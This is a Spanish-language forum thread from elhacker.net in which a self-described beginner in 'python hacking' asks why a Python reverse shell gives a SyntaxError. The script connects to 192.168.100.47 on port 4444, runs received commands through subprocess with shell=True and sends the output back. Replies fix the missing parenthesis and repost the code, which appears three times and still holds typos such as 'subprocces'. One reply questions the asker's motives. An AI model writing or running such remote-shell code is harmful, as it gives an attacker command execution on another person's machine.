elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Error en python en while
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error en python en while  (Leído 5,195 veces)
0x22

Desconectado Desconectado

Mensajes: 77


Ver Perfil
Error en python en while
« en: 1 Enero 2022, 21:34 pm »

Hola todos, estoy comenzando en el python y estoy aprendiendo a hacer una reverse shell
Lo que no entiendo es porque me da el siguiente error:   while True:
    ^
SyntaxError: invalid syntax


El codigo es:
import socket
import subprocces
def ejecutar_comando(command):
    return subprocces.check_output(command, shell=True)
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("192.168.100.47",4444))

connection.send("\n
  • Conexion establecida uwu\n"
while True:
   commando = connection.recv(1024)
   resueltados_command = ejecutar_comando(command)
   connection.send(resueltados_command)
connection.close





Lo estoy haciendo exactamente como en el video solo cambie el nombre de las variables pero no se porque me da ese error


En línea

Xyzed


Desconectado Desconectado

Mensajes: 306



Ver Perfil
Re: Error en python en while
« Respuesta #1 en: 1 Enero 2022, 23:28 pm »

Hola.

El error está aquí:

Código
  1. -
  2. connection.send("\n [+] Conexion establecida uwu\n"
  3. #te falto cerrar el parentesis aca.
  4.  
  5. #solucion:
  6. import socket
  7. import subprocces
  8. def ejecutar_comando(command):
  9.    return subprocces.check_output(command, shell=True)
  10. connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  11. connection.connect(("192.168.100.47",4444))
  12.  
  13. connection.send("\n
  14. Conexion establecida uwu\n")
  15. while True:
  16.   commando = connection.recv(1024)
  17.   resueltados_command = ejecutar_comando(command)
  18.   connection.send(resueltados_command)
  19. connection.close
  20.  


Ya que mencionas que estás comenzando con Python, no es normal que al empezar estés usando sockets.
Supongo que simplemente copiaste y pegaste el código, sin entender nada de lo que haces, eso no te servirá en absolutamente nada, a menos que solo quieras molestar con la reverse shell...
 
Saludos.


En línea

...
0x22

Desconectado Desconectado

Mensajes: 77


Ver Perfil
Re: Error en python en while
« Respuesta #2 en: 2 Enero 2022, 10:42 am »

Hola.

El error está aquí:

Código
  1. -
  2. connection.send("\n [+] Conexion establecida uwu\n"
  3. #te falto cerrar el parentesis aca.
  4.  
  5. #solucion:
  6. import socket
  7. import subprocces
  8. def ejecutar_comando(command):
  9.    return subprocces.check_output(command, shell=True)
  10. connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  11. connection.connect(("192.168.100.47",4444))
  12.  
  13. connection.send("\n
  14. Conexion establecida uwu\n")
  15. while True:
  16.   commando = connection.recv(1024)
  17.   resueltados_command = ejecutar_comando(command)
  18.   connection.send(resueltados_command)
  19. connection.close
  20.  


Ya que mencionas que estás comenzando con Python, no es normal que al empezar estés usando sockets.
Supongo que simplemente copiaste y pegaste el código, sin entender nada de lo que haces, eso no te servirá en absolutamente nada, a menos que solo quieras molestar con la reverse shell...
 
Saludos.
Hola, gracias por resolver el error no me había dado cuenta del ).
Y estoy empezando en python hacking, en python se mas o menos lo basico(clases, blucles, variables, funciones etc) para poder empezar en el python hacking.
En línea

Danielㅤ


Desconectado Desconectado

Mensajes: 1.673


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: Error en python en while
« Respuesta #3 en: 2 Enero 2022, 16:38 pm »

Hola, además de que el intérprete de Python te informa el tipo de error y la línea donde se encuentra el mismo, también el mismo software editor de códigos como por ejemplo Notepad++ te indica que falta cerrar un paréntesis porque después de ese paréntesis que no existe es decir dónde debería estar, el resto del código se pone todo de un solo color, es decir de color gris y ahí te podes dar cuenta fácilmente que faltó cerrar un paréntesis de alguna institución.


Saludos


Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Python Error
Scripting
kyps 9 6,513 Último mensaje 4 Enero 2010, 16:14 pm
por kyps
Error en Python
Scripting
Fyrox 2 2,512 Último mensaje 31 Agosto 2011, 20:04 pm
por Fyrox
error en python
Scripting
0xDani 3 2,405 Último mensaje 12 Mayo 2012, 21:09 pm
por Runex
error en python corre bien pero marca error
Scripting
Joe Fraddy 3 2,614 Último mensaje 25 Agosto 2015, 19:06 pm
por engel lex
Error en python 3.6.2
Scripting
HBN 2 1,964 Último mensaje 12 Septiembre 2017, 03:30 am
por HBN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines